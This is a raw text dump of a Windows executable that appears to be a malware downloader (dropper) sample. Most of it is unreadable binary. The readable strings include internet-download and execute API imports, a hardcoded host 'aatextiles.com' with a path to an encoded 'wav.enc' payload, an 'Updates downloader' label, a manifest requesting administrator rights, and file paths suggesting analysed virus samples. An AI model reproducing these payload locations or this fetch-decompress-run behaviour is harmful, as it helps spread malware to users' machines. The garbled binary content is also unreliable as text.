L!This program cannot be run in DOS mode.
(((()(((Rich(
.rdata
@.links
@.reloc
SVW3S]H
ulh 1R
_3^@[xSP
@SMTQutPuX
bSETPW
SWSulh
SM`A<uX
Et}t N
WSuhulSuhh
dM8QVh
SSSSh0R
,MlE$0R
ElElMXkpUl;T
}H]tkp
SSPVu4
uL9~lu
0]tSudE$PSSF PSu\
|N9~lu.j
^M\QMPQjPu\
VEPPjuh
3SSSSuh
]p3SE0PEpPh
]T]t=0R
ETPupu`V
ETPupu`uh
M`Ep+;t
G>Zu}~
.}pEL@`3
Vu\RVh
EDudEpu@
YjlES0R
SE PupudV
EPPh0R
@hIEH;
*v*v+vt*v-v5*vP)v+*v+vf*vg*v*vB*v*v7
*v*vS+v!S+v*v*v
application/*
text/*
RtlDecompressBuffer
InternetReadFile
HttpQueryInfoW
HttpSendRequestW
InternetSetOptionW
InternetQueryOptionW
HttpOpenRequestA
InternetConnectA
InternetOpenW
WININET.dll
HeapDestroy
GetCurrentDirectoryW
FreeLibrary
GetProcAddress
LoadLibraryW
HeapFree
DeleteFileW
CloseHandle
WriteFile
lstrcmpW
ReadFile
lstrlenW
GetFileSize
CreateFileW
GetTempPathW
GetModuleFileNameW
HeapAlloc
HeapCreate
ExitProcess
GetModuleHandleW
KERNEL32.dll
wsprintfW
USER32.dll
ShellExecuteW
SHELL32.dll
aatextiles.com
/images/
gallery/wav.enc
profit
og/n@ewslet
&/auto)t
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
i0v0000000000
1#1@1J1111111
2(2=2C2U2\2a2l222222222&3w3333
4,4E44
5?5q5555555555
k i l f 1 . e x e
U p d a t e s d o w n l o a d e r
r n t d l l . d l l
b u d h a . e x e
C : \ U s e r s \ j o h n \ A p p D a t a \ L o c a l \ T e m p \ E A 8 A 6 B 3 1 C F 9 1 6 C 6 A 3 2 E 5 6 5 C 4 1 3 5 4 8 4 B 4 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ c 5 a c b 0 0 7 4 2 0 a 1 4 c 3 0 9 5 0 7 8 6 6 6 4 9 1 2 1 0 a . v i r u s . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 5 2 3 4 8 5 8 4 b 8 8 d 2 3 7 a a 2 f 4 b b 2 b c 9 0 2 2 5 a d c 9 9 4 5 3 1 5 a b e 8 c c 7 4 2 b 8 6 9 f 1 4 5 8 6 8 8 9 a 2 . e x e
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ f b 5 e 5 9 1 f 8 8 0 4 6 9 5 c 8 e 9 6 d a 5 6 0 6 b 1 a a a b f 5 f c c 9 b 7 e 4 3 2 7 6 c 6 d b 0 1 f 1 5 9 a 3 1 e 6 b f 2 . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2
C : \ U s e r s \ a d m i n \ D o w n l o a d s \ 2 e 1 6 4 9 a 4 a a 9 d 5 d 6 e _ b u d h a . e x e
C : \ 6 6 2 0 3 3 f 1 2 c f c 6 9 5 4 4 8 0 3 8 9 2 c b 4 d c f 7 a 8 e 1 e a 3 6 1 7 4 9 6 1 5 0 c 8 5 6 d b 2 4 b 9 0 2 7 c 3 5 a 9
C : \ U s e r s \ R A 4 9 1 ~ 1 . V U L \ A p p D a t a \ L o c a l \ T e m p \ c 6 3 d 3 7 5 0 2 5 b f c f 8 c 4 3 e e 6 8 5 e d f c 5 7 6 5 e . e x e
C : \ U s e r s \ P e t r a \ A p p D a t a \ L o c a l \ T e m p \ b u d h a . p e 3 2